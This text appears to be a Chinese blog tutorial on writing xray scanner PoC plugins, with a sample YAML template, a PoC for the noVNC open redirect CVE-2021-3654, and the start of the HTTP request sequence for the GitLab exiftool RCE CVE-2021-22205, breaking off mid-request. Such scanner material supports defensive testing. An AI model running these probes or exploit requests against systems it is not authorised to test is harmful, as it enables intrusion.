我的漏洞扫描及安全应急之道

编写POC

以xray为例

插件编写

官方公布最基础的POC如下

name: poc-yaml-example-com
# 脚本部分
transport: http
rules:
    r1:
        request:
            method: GET
            path: "/"
        expression: |
            response.status==200 && response.body.bcontains(b'Example Domain')
expression:
    r1()
# 信息部分
detail:
    author: name(link)
    links: 
        - http://example.com

编写编辑器

poc实践

CVE-2021-3654

路径处理出了问题，网站域名加上//example.com/%2f..即可进行url跳转

直接get请求，所以poc很简单，有手就行。

name: poc-yaml-novnc-url-redirection-cve-2021-3654
manual: true
transport: http
rules:
  - method: GET
    path: "//baidu.com/%2f.."
    follow_redirects: false
    expression: |
      response.headers['location']=="//baidu.com/%2f../"
detail:
  author: txf(https://github.com/tangxiaofeng7)
  links:
    - https://seclists.org/oss-sec/2021/q3/188

CVE-2021-22205

exiftool解析造成的rce
一共发送2个请求

请求1:

GET /users/sign_in HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

获取csrf-token

请求2:

POST /uploads/user HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundar